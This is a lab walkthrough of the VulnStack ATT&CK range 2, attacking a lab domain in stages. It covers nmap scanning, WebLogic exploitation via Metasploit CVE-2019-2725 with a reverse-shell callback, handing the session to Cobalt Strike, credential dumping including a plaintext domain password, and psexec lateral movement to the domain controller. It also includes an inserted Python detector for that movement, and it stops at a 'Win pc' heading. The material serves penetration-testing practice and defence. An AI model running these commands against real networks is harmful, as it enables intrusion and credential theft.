Red Sun-VulnStack Shooting Range-ATT&CK (2)

Red Sun Actual Combat 2:

Foreword:

VulnStack is a shooting range knowledge platform built by the Red Sun Security Team. The range environments (CMS, vulnerability management, domain management, etc.) are all modelled on the business habits of domestic enterprises. All environment design ideas come from the ATT&CK red team evaluation design model, and the ranges and their challenges are built around environment construction, vulnerability exploitation, intranet collection, lateral movement, channel construction, persistent control, trace cleaning, and so on. To learn more about intranet penetration, this article studies and records the penetration process of an intranet domain range provided by the Red Sun Security Team.

Environment preparation:

Environment setup:

Kali attack machine, Windows Server 2008 (web service), Windows Server 2012 (DC, domain controller), Windows 7 (PC).

Network topology diagram:

Here we start the WebLogic service and 360 on the web server, and enable the firewalls on the other devices.

1. Information collection:

1. Port scan:

Use Kali's nmap to scan. Note that the web server has a firewall enabled, so we use the -Pn parameter, which skips host discovery (the firewall drops the ping probes) and scans the host anyway. Three useful ports were found: 80, 445, and 7001. 7001 is the WebLogic service port. The service detection also reports the server as Windows Server 2008 R2 - 2012.

nmap -sV -Pn 192.168.31.80

We tried visiting http://192.168.31.80 and http://192.168.31.80:7001, but did not find any useful information.

2. Directory scan:

Let's try scanning with some tools.

a. Using the dirmap tool, nothing was found.

 python dirmap.py -i http://192.168.31.80

b. Using the dirsearch tool, still nothing was found.

Outrageous...

c. Finally we tried Yujian, but there was still no useful information.

3. Vulnerability scan:

Since port 7001 is open, we ran weblogicScan against it directly and it reported two vulnerabilities.

2. Vulnerability Exploitation

1. msf attack

search cve-2019-2725
use 0
set rhosts 192.168.31.80
set lhost 192.168.31.216
set target 1
run

Successfully got a shell.

Switching to the web server's perspective, I found that 360 did not report any attack.

2. msf handoff to CS

a. We first start the CS team server on Kali, connect to it from the physical machine, and add a listener.

./teamserver 192.168.31.216 123456

b. In msf, we spawn a new process and hand the shell over to CS.

background
use exploit/windows/local/payload_inject
set session 1
set lport 6666
set DisablePayloadHandler true
run

Set the beacon check-in interval:

sleep 5

3. Intra-domain information collection

1. Try privilege escalation first; the escalation succeeds.

1. Intranet information collection

Check the target machine's information and collect the internal network segment; the intranet is the 10.10.10.0 segment.

Checking the domain user information, we find the domain controller name DC.de1ay.com.

Pinging that name gives us the domain controller's IP.

2. Grab password

Dump the credentials on the web server; the one that works is 1qaz@WSX.

4. Lateral movement

Recall that we found port 445 open; we use psexec for lateral movement inside the intranet.

1. Create smb listener

2. Lateral movement

Get domain control!

You can also perform the lateral login with commands here.

rev2self
make_token de1ay.com\administrator 1qaz@WSX
jump psexec DC smb
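One way a defender could spot the psexec step above in the domain controller's event logs, as an added example that is not part of the original write-up: it correlates a network logon (Security event 4624, logon type 3) with a service installation (System event 7045) whose binary is served from the ADMIN$ share within a short window. The event records, timestamps, service name and the 10.10.10.80 source address are constructed for illustration.

```python
# Added defensive example (not from the original write-up): correlate a network
# logon with a service installation on the DC, the pattern produced by
# psexec-style lateral movement such as the "jump psexec DC smb" step above.
# All event records below are constructed; only the host name DC is from the page.
from datetime import datetime

# Constructed events in the style of Windows Security (4624) and System (7045) logs.
EVENTS = [
    {"time": "2024-01-01T10:00:00", "host": "DC", "id": 4624, "logon_type": 3,
     "auth": "NTLM", "user": "administrator", "src_ip": "10.10.10.80"},
    {"time": "2024-01-01T10:00:03", "host": "DC", "id": 7045,
     "service": "a1b2c3d", "image": r"\\127.0.0.1\ADMIN$\a1b2c3d.exe"},
    {"time": "2024-01-01T11:00:00", "host": "DC", "id": 4624, "logon_type": 3,
     "auth": "Kerberos", "user": "backup-svc", "src_ip": "10.10.10.201"},
    {"time": "2024-01-01T11:30:00", "host": "DC", "id": 7045,
     "service": "WinDefend", "image": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def service_from_admin_share(event):
    """psexec-style tools copy their binary through ADMIN$ and register it as a service."""
    return "admin$" in event["image"].lower()


def find_psexec_lateral_movement(events, window_seconds=60):
    """Return (source_ip, user, service_name, host) for every network logon that is
    followed on the same host, within window_seconds, by a service install whose
    binary lives on the ADMIN$ share. Benign logons and normal service installs
    (the second pair above) produce no hit."""
    logons = [e for e in events if e["id"] == 4624 and e["logon_type"] == 3]
    installs = [e for e in events if e["id"] == 7045 and service_from_admin_share(e)]
    hits = []
    for logon in logons:
        for inst in installs:
            delta = (_ts(inst) - _ts(logon)).total_seconds()
            if inst["host"] == logon["host"] and 0 <= delta <= window_seconds:
                hits.append((logon["src_ip"], logon["user"], inst["service"], inst["host"]))
    return hits


if __name__ == "__main__":
    for hit in find_psexec_lateral_movement(EVENTS):
        print("possible psexec lateral movement:", hit)
```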

3. Win pc